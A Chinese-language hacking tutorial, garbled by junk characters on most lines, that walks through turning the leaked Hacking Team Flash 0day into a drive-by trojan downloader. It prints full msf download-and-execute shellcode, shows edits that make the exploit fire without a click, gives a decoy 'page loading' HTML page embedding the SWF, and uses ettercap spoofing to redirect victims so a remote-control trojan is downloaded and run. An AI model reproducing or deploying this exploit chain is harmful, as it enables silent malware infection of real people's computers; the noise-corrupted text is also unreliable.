|
+ C& ^. N) s) [3 { 三、flash 0day之手工代码修改制作下载者实例入侵演示 2 h. b+ O. Y: c
3 N+ k( A7 G# X- n6 T$ z3 `- {' v4 u2 `$ V$ |0 o
利用到的工具:
4 q+ ?7 A9 g9 D$ w2 a 8 c. y0 @7 s% x) e7 E
, U. K; Y+ x6 d
Msf ( Y A1 o0 [. y
% j- \- W+ e( K( T( |
- r& X, x7 Q5 i5 p9 O, d+ W
Ettercap - d& ` j' ^# d4 x- I; q
& [0 W C, ^9 C( I* F H0 P
. O8 |- W, V: c1 H Adobe Flash CS6
* ^: g& U- D' I' U( o* m : P5 W0 O9 c) F7 l
( }6 [* |6 f: D) r: c7 }/ e
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
$ H& r, t: b$ i# m$ g% d : b1 ^' \# c& R( p2 ~, n6 a
! k+ G0 V( w/ n$ i 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options ( u: i* |( p. i
$ h/ Q) c( _9 j! Z# m9 W5 b5 e. t
p' d- ^: p& F! R
如图: ) I: f7 h5 o4 X" X$ l
' q* b; Y7 Z- v; c' ~3 E$ f3 M
$ o Y. V! h' e
) O! `4 z# Z8 D& _- v* k ; m, U+ Y9 q0 c- D( P$ j# B- L
. C7 V) ^4 Q: P1 P
$ ~3 V/ z$ ~: B( }* I d ! M* j8 C# E9 X. R' E
' j l+ w! h$ @ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 8 a% L* S& z7 b# I
$ ?- t P/ d5 j+ @
1 _- q9 M( c$ ]: p% D
% E2 W) b% O6 [* ] W7 O( | , J% C) i3 c' j; R( J' t
% J8 L0 W. b) Y0 R9 w# c$ n; k! I
$ q; w' g1 x) o9 [0 r C* D9 E 8 E8 {9 D, N# d+ T2 `7 I
' L! s+ ~3 f0 s. n) C4 ? 然后执行generate -t dword生成shellcode,如下: ; }$ U: H- i# s& B: N8 Z9 E
' _+ q% R& n' _4 e
- d7 F% o8 Q# g) o# D- J, Z' v
, I4 f5 l# O2 j
1 ^1 L: r2 m2 K( K2 N$ }' Z4 I1 O9 j/ v6 U9 L
复制代码到文本下便于我们一会编辑flash exp,如下: 9 C: x) @* [. c( z# k8 [" Q
' ~+ y7 J( I" F9 a8 u% j8 P2 X/ Y; `# d1 }" f3 S' @8 A
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, . l7 Z, W+ ~! a3 a1 L! K
& V1 n* x( q# `; `! S. w) J1 G
/ _" r3 r; @! c) T0 y9 _
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
/ Z3 A& B5 }$ n) `9 N
! i% O2 W# D$ F5 I0 H
6 B) \3 u8 L: L8 J } N8 _6 a 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
; c2 N+ Z3 T$ u
! [7 _( u6 i F' ~7 V. U
" h/ ]0 Y, v; b$ ^, L 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
/ @6 x+ N# p9 l0 c* H
2 o1 |& e# s1 ]$ g/ n) r4 x# l/ {4 H& h- U8 G7 }
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
% H6 ?; j* z8 I+ u % y3 ?6 O& `+ n4 k
9 N6 j6 a/ e$ @6 E2 H 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
6 u, _3 B9 r4 S$ R 9 B: u5 e4 ~) Y8 f6 t
( j3 u q. z- {% u# o8 ]1 V 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, M2 p m' _1 i" k# ?
! t5 A( G1 H' c& A" r# F0 l8 L7 J% k6 N7 |. ]: E' Q& Y
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
0 A# d/ t1 p) P# S5 p8 T9 Y2 f 1 x1 E7 [1 ?# j" G. q" f* G
, _8 ~! ?( D7 |( D2 ?8 D8 Y 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
" e9 y7 V5 [; |- Y& ^( r . J9 Y& m& ?% a# q* F4 r; ^
( I+ y+ A8 s3 J8 A 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
( G# c; U' }, ]& Y5 m
8 s: g- S7 U. s0 n9 k/ f: `5 F8 C. x0 u6 {$ [
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 4 a, k5 F- o1 ~* c. Y
" Q. |) H2 z2 ?! V) s
& x! h4 F& a/ }7 n8 V/ n+ S
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
* ^9 W- |& C: G1 K1 P. b! H
" f% e ~7 E/ |2 M9 A [5 t, i2 b: O
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
0 q' i. m1 j3 u. d- U1 i* q- x , n4 F% E2 s( G% X& W' k! J
$ e% ?- o0 T8 S6 |4 r
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 % C$ f: o9 l, n7 J( W; \: j
; r# \3 U1 u# O! w
% J! H- }: H- f) Y
% E2 P6 K& w: Q6 s 4 A4 n- |, ]! Q
3 t( S G! |. M1 M- L: V3 m( G
2 d1 A* s3 u* Z " v3 _* x- U x0 h! B4 k4 V
" |6 j# k5 a0 X% o: h5 F5 t! A 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
7 J% J) |" O/ a7 L; V* {0 P/ j , [+ F8 A. ?9 H+ [; D7 b8 f
% ?; a. _& M. X
; e7 b2 G# v6 l8 @% }
! \; d# a' R9 z2 }( f. @3 A
0 L# z+ s5 h( W8 N 先修改ShellWin32.as,部分源代码如图: : \2 T4 S6 _. ~/ e& J2 T0 H
) ?9 ?1 e; A0 x: b$ w' R- @. V4 I* S
% q5 l$ z# l! n7 G u : u* h' |+ O& L0 b
6 N8 w1 _" V0 Q! T& ^. O
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
! m `3 K3 q8 U* G& M* j6 j
+ `$ R) l! [0 @5 i/ @6 @ a |( a% X; d; ]
+ t( l$ B, A% k" s
$ l1 `( q' f' M9 ]* _; ^$ |
# F" M( ?7 z2 Y: v+ P 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
$ Z4 W. c y3 g6 n5 b! c6 o $ G& |+ S* v% d1 ]0 N8 u% V! |
$ r1 F( Q# }$ w
2 c. Q+ B4 ?) F8 H
6 A$ o; A5 Q& Z2 Y: v1 i) P( y. P( K$ K8 |% K: |
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
/ ~1 q! @4 |. U
( @6 o' w7 I: ?% _9 m
1 t1 H: S7 \8 _
% v; v3 M5 J( W+ _9 s+ e
8 g5 `, W) e& N% H& k( ]7 q# ^$ t% S0 ~
7 j n) ~' }% ~3 C9 q8 s- e3 z
- p7 y) U% O+ l0 g; f' N
% W1 t& {9 ]4 k& X0 W& d
' |# g& G$ x7 P4 \: X1 a
: B1 A4 @0 H) j# Q4 H+ _
7 [$ K" |- w( o- z5 u 然后点保存,下面我们来编译一下,打开 ; t: j" \2 O- M7 Q: o
+ t6 y2 Y" |8 O* l, S8 f5 _
$ X1 Y6 j F8 M; K exp1.fla然后点文件-发布,看看编译没错误 u4 h5 ?! X! n* _" V7 f3 Q4 a
; N( G( }5 p" ?
# H& B* U( T' Y- v- N# P
3 b( d, e' L* \* g6 ~8 }0 @
. a' x. D$ H7 j3 j; o
" i; [; Y2 C% H# J9 P M0 c
8 B8 \' s: w3 r6 D 1 s7 b$ Z9 M% W$ Q: y- q7 e
3 \" T' l3 h4 \- C 4 ^ J1 P/ t* S3 g1 f
4 }2 V$ |) t5 z1 g) `3 n% u- _! Z/ w- X K |9 w" e
4 N9 m. r. G5 x8 h- t : P+ q6 f+ d4 n }! C- W' F
* J7 P; o; K/ l; ?1 g2 l- @ 然后我们把生成的 0 k/ w7 Q( t5 `) m. M6 I
* `' i$ v* N: }2 L8 i W* O8 A
+ ]7 O: d" V9 l8 V. ?0 x. ]3 Z
exp1.swf丢到kailinux 的/var/www/html下:
) H1 K- y2 ~; q3 C9 ]* S: C
6 v% u7 Y2 P8 M, L* t% L( o, B% c0 S& _, m/ _7 U% b% g( n
然后把这段代码好好编辑一下
) Y) `' e5 u( B0 K- D
" ^+ `. x1 a" w) `2 B
0 D/ f2 f8 |5 `: y- _7 ]/ u $ y3 b- R$ P; q# ]+ J
2 h0 }7 z3 p/ x5 G% l2 i
& S f# `2 \) `2 e' }* k! O1 }& |4 m
! Y3 K* P( h" [) | K; u6 D. M Z# x5 t1 p; R' Y
5 v+ G. {; Q$ M; P' |& X
|, `! ^2 O; U- \, `' L
( ~& }, O1 P- I: n7 Q
& Z a# S) m, m1 E" `' G ( h0 u+ W! W! [% p: o$ f: G. g+ V
0 o9 _6 S, v/ B7 \# {9 q }
: v5 H' l# H; h" A$ f5 k1 o3 @
! U' w \" h8 ] 9 ^( A# L$ I* d. n: X2 L9 U! q( d9 s
6 `1 \4 h4 }1 n2 v " s* v0 J8 D0 g8 _
$ a' L6 a X+ G K
0 c- Q# A/ q) r5 E- p2 Q <!DOCTYPE html> 9 F B- p* g+ T' l% N9 a# @9 I: H
+ E& t o; q. l Z8 ?
& n' |" N0 H( {5 A E- z7 ]
<html>
8 X6 T/ c6 y0 u& T; g) B4 s3 { 1 B2 j6 ~" M$ X; ~# }
5 Q2 y4 Y! r3 @; p <head>
" }4 p3 q* T' t1 H* {& P+ o4 \ 5 ^6 x/ C$ T% n* W4 v
+ g j" q9 g, i) z$ N" ]
<meta http-equiv="Content-Type" content="text/html;
; c- i% | m! _# x ( i6 \) l. W2 [1 }3 P: {
) Z/ a% W: _8 L7 ^. Q charset=utf-8"/>
* m' \" Z% |% Q: C. T/ r
( v1 X4 r, R* L: k& L& e8 W) ^# R7 b, f# _
</head>
2 D5 h3 ]% q2 _" V) _- s l
/ w( F+ J, q" Q9 y q& `- t3 t) _ @; J% F5 j$ r) D
<body>
" L5 g7 Y& u7 X' g: Q
+ l# q, }. t2 o& y2 K# M; t3 p- Y
! s' I: x' e5 j+ k* \6 Q <h2> Please wait, the requested page is loading...</h2>
0 J+ {/ R' f* ]! C+ [) {; r
; a2 d: n+ l8 W/ i* ?& ^0 F3 Y' z# i
<br>
8 ?! Q) t( A( V3 u& H
& n" {$ A; Y3 v0 ]" v+ B5 ]3 O
: F4 B6 e9 H9 _, C. y <OBJECT 8 n4 H* o4 ^# p! c' P: u! t
# j0 i/ y8 C' E5 F
4 e) `- \% X0 j' S& X classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
; b$ u% \8 y |; l6 O" G : b* [) S3 [: {% b S" Y9 E f
; m. ?9 P. O# Z, _8 ?3 g VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
8 [, Y, I+ e4 U5 i2 | h! [! p! H
4 J3 W* e- y+ A
% s$ `: c# I& o </body> ! s+ A. V! a+ x
! }- K! {( C0 _
: c' W) K7 s% B m# q
<script> : x5 I* z0 L; |6 K8 h! g
5 Q4 m" ^0 h$ D% J$ O: T% y; D; W
: y& u) Y- T. w1 E3 C setTimeout(function () {
, S, _% C- O* S+ ]% I) ]
f( p C8 m* O y! b/ q2 O
P" m4 e, j7 h
- l7 ^) }7 l) X+ y
& F0 u6 f$ [% [8 h& G, M
" J% i% `: e; K+ x1 z: w- f9 B window.location.reload(); ; l6 {% G( h9 W! p% q1 n
/ D8 ?1 q1 U1 s F, @ M B0 p
) Y, \& o4 I' d2 B0 J. t4 F }, 10000); & H- H: N/ _, B$ ~5 T
( F) u9 w! H( g+ W3 N# J/ W
, j- T- E+ k6 O' w; w / Q* X/ `( b2 ^
" a# ~! W( y- p9 n
; l( S/ l5 X, P& A: R" K( u </script> / T$ \! e. C7 v! ?0 Q* N
z9 D n' Y/ @# h* P" ?
2 `0 |' k# `' T/ d! l </html>
/ d' \: M+ M& X1 g1 C- N $ j: V5 ~; }' P& K, Y
5 w( L, L7 E* [5 M/ ]1 `
( O' ?: K5 {2 c* ~# z, t# k C$ t
8 X" S1 j3 J3 Z* a. l* j! j9 b& K: @ u" e! F
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 1 b9 g7 t: g8 m. U: `! e0 q( V
2 y8 w! p0 q/ p9 _ }1 x- h
% j+ f: ~7 l. j( Z 7 u. m+ n N% C+ ]% l- Y) [" y$ L
! K: A9 X# I. m( A; w; @4 P0 t
/ _* l: O- T- a1 u @ & X/ _6 l) R! R: Y
" _3 B5 @9 i) h3 I& H9 k9 h
5 x5 n+ z+ [6 n' Q0 L 1 ]. p& I+ S) H8 A4 D* y- c
; ~2 F0 [; ~; k, z. ?; }! e) L! q
9 \6 x8 E5 ]3 t* |. Z, l
; f' y( P0 _# \3 t6 N; s! u
& {: z. v. c* b4 N8 Z |1 {
9 u- a# {% Y3 O9 j/ g' R 3 a: [, _- n' P9 l
$ R h1 v5 \: n" `7 p% j
, x' A. ^! T6 [) u4 K g7 m
下面我们用ettercap欺骗如图:
( a! m! V4 T) F6 o& g2 ?9 [7 Z. z ! A! Z# `, D! X
% [5 x G- D4 K$ C2 H
/ E6 i: l5 H3 Z2 f9 K/ p
# Q5 e8 \1 n4 q7 C5 `, P& p, G: e% \. a7 L6 ^* E
2 p: v8 ]7 [% Z/ x5 x! p) a7 n ( ^8 H8 @( g' ]! b- J/ k
$ D- ?6 H/ {- h 下面我们随便访问个网站看看: " c: @% N7 J, J# o- d1 _+ ^) H
# u' V2 l+ }9 I4 h# S* @7 c. d2 ^, V1 {$ e. L' Z
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
) q& ~' O% C5 N" i* H# D j7 Q ?) T3 j7 g9 \, Z, Z( b$ ]
) k0 Z" L. }" Q! \$ }
! V4 U0 t1 O9 v2 C+ W
( u$ m) }/ R8 m, l0 f" h/ }" M+ ~/ l, I$ d
我们看另一台, % \: n9 B( N- G
# G: `: d1 d! p. j7 t$ i- x
_1 |, W* u( d0 M 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
8 C. V. q# }, \) X" N* N |